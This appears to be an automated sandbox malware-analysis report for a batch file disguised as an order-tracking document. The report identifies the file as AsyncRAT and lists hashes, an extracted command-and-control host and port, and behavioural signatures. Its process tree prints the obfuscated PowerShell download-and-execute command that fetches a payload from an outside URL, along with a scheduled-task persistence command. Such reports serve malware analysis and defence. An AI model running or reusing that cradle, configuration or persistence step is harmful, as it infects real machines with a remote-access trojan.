Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
174s -
max time network
273s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
10/09/2022, 15:56
Static task
static1
Behavioral task
behavioral1
Sample
TRACK-ORDER#114-85737.bat
Resource
win7-20220812-en
General
-
Target
TRACK-ORDER#114-85737.bat
-
Size
65KB
-
MD5
44d81d1aecc0e4b0aa0f9ad726a02e99
-
SHA1
eebf5c17f72ee3a323619f45dd1db9d03a417c37
-
SHA256
4d634f419ee6d84324dccb8c2bbe3ed583220a676c92b1facf34bc749b4a9712
-
SHA512
6aff752752bdc92478e336c4e71e6d77ada065a76e255e84070834bcdcca52d296cc22d7f778d1dd1cc859b31716fb5a08325977cda550d2ab5da6d490121cb2
-
SSDEEP
192:nyj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj5yj/:4
Malware Config
Extracted
asyncrat
| Edit 3LOSH RAT
Default
saedmad.linkpc.net:6666
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Async RAT payload 2 IoCs
resource yara_rule behavioral2/memory/4144-152-0x000000000040E12E-mapping.dmp asyncrat behavioral2/memory/4144-151-0x0000000000400000-0x0000000000414000-memory.dmp asyncrat -
Blocklisted process makes network request 1 IoCs
flow pid Process 5 2428 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation WScript.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4128 set thread context of 4144 4128 powershell.exe 112 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4524 schtasks.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2428 powershell.exe 2428 powershell.exe 4128 powershell.exe 4128 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2428 powershell.exe Token: SeDebugPrivilege 4128 powershell.exe Token: SeDebugPrivilege 4144 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 644 wrote to memory of 3992 644 cmd.exe 86 PID 644 wrote to memory of 3992 644 cmd.exe 86 PID 3992 wrote to memory of 2428 3992 cmd.exe 87 PID 3992 wrote to memory of 2428 3992 cmd.exe 87 PID 2428 wrote to memory of 5056 2428 powershell.exe 94 PID 2428 wrote to memory of 5056 2428 powershell.exe 94 PID 5056 wrote to memory of 2340 5056 WScript.exe 96 PID 5056 wrote to memory of 2340 5056 WScript.exe 96 PID 2340 wrote to memory of 4524 2340 cmd.exe 98 PID 2340 wrote to memory of 4524 2340 cmd.exe 98 PID 1796 wrote to memory of 3876 1796 WScript.exe 109 PID 1796 wrote to memory of 3876 1796 WScript.exe 109 PID 3876 wrote to memory of 4128 3876 cmd.exe 111 PID 3876 wrote to memory of 4128 3876 cmd.exe 111 PID 4128 wrote to memory of 4144 4128 powershell.exe 112 PID 4128 wrote to memory of 4144 4128 powershell.exe 112 PID 4128 wrote to memory of 4144 4128 powershell.exe 112 PID 4128 wrote to memory of 4144 4128 powershell.exe 112 PID 4128 wrote to memory of 4144 4128 powershell.exe 112 PID 4128 wrote to memory of 4144 4128 powershell.exe 112 PID 4128 wrote to memory of 4144 4128 powershell.exe 112 PID 4128 wrote to memory of 4144 4128 powershell.exe 112
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\TRACK-ORDER#114-85737.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:644 -
C:\Windows\system32\cmd.exeCMD.EXE /C POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$Whnj='IEX(NEW-OBJECT NET.W';$edKw='EBCLIENT).DOWNLO';[BYTE[]];$ARsr='TUUL(''https://surveydatabd.com/img/im.png'')'.REPLACE('TUUL','ADSTRING');[BYTE[]];IEX($Whnj+$edKw+$ARsr)2⤵
- Suspicious use of WriteProcessMemory
PID:3992 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePOWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$Whnj='IEX(NEW-OBJECT NET.W';$edKw='EBCLIENT).DOWNLO';[BYTE[]];$ARsr='TUUL(''https://surveydatabd.com/img/im.png'')'.REPLACE('TUUL','ADSTRING');[BYTE[]];IEX($Whnj+$edKw+$ARsr)3⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2428 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Not\xx.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5056 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Not\xx.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:2340 -
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn App /sc minute /mo 3 /tr "C:\ProgramData\Not\Bin.vbs"6⤵
- Creates scheduled task(s)
PID:4524
-
-
-
-
-
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\ProgramData\Not\Bin.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1796 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Not\Bin.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3876 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\Not\Bin.ps13⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4128 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4144
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
83B
MD5228c44b9cc0e8c86c51fddaf3294bcf8
SHA17e83a7e1e4f33a4a299554090de4563534629754
SHA256fce64aa23e5bc07ad08d364af38b3a3adc4effc0eaf72c90acf868b7be3fdf6a
SHA512bbb26d73fd47a926cf358ae5263fb246a93201b60d8650018e24b027e7e708b9afdb5a0aeaed7444736eb319721b2da4eca57e60e3e98643270e09e1d0b433d6
-
Filesize
345KB
MD5bb3e63b6d61561accb4026bcbd5a7afb
SHA121be5417c5fde2934f789fc9ca3fd0f55225f4a2
SHA25656a539c6a9a2f57c81e3f873360f451c4c452f7bb3fad9353e9ce822fedaf1de
SHA51250472f0848dec09a4184648072b731482100311e6b0f730002606cfdf4094e8b9f2bdc98f0a2fee085e479c05aa2c7d3eb99040c7c8c35737ffbc4e23fd2207c
-
Filesize
118B
MD59c7994acb861283eab4675bb06ba4159
SHA1f6e83e6d35dbcf9cd3a0d3677d7b676df79d1b30
SHA256e86197ddea92b4f651707713ffe7db2bb252786a6ae6196481433cc43e7a999c
SHA512a512e20e819941e0bf713e42cbbf0c5ddf541f0976f49f022e2c1227f7a414443703fc985e65f0ced33f4d9c6cbd58849b28d05eb4b676c6a087ea10a3a9ff26
-
Filesize
81B
MD5bed7fd2f5fc7183c0a509fc8f9d48ec9
SHA1460dd3af5d3010be510b5593ba8740912c92fc85
SHA2562f80e6b366b6a89a4e28234ab02f4bbc2232c899e5f1f167900567972c9589c2
SHA5124c377cb0892eae4a003005f0b4bc081dd5f5a519cb662ab8dab9e2446d22a357a3774824e4c7d3613031a9a10dc061f79371c15510deabd21b8a80ff14f41445
-
Filesize
169B
MD5192a7c188e6ede340bdb4d518a4ed036
SHA1141a993b91c38b734579427b815df181a0ee3cb1
SHA2565e8c30a0ac20a2cac5e482a59ccbf94d9ac470034a4ef6cba58740d5056b7466
SHA5123b7d1d75f665604896751036966d296558e2e11151c0de83cc079dda069d8f560cd0f0bd623c08ab09a466fadbc0d91d8e577dc3c32613fc9e2c807a023e1f3e
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
Filesize
1KB
MD56b7ac01e198a7605eb839bc9d0f82892
SHA11745825f055a97a44a877ce22b772709bdfafe0a
SHA256bd6de323224adb57779eea57fe6817dea350d402161165a7a203540b5d98ee34
SHA512cfab4ce52e0634e216945d6d54bb1801c9cda03a4c6e01881f044218ccd1383daa962fc7f5d83a910fb6ee89dcb4cfd310db706394ea4b6dac8b1870f1755a14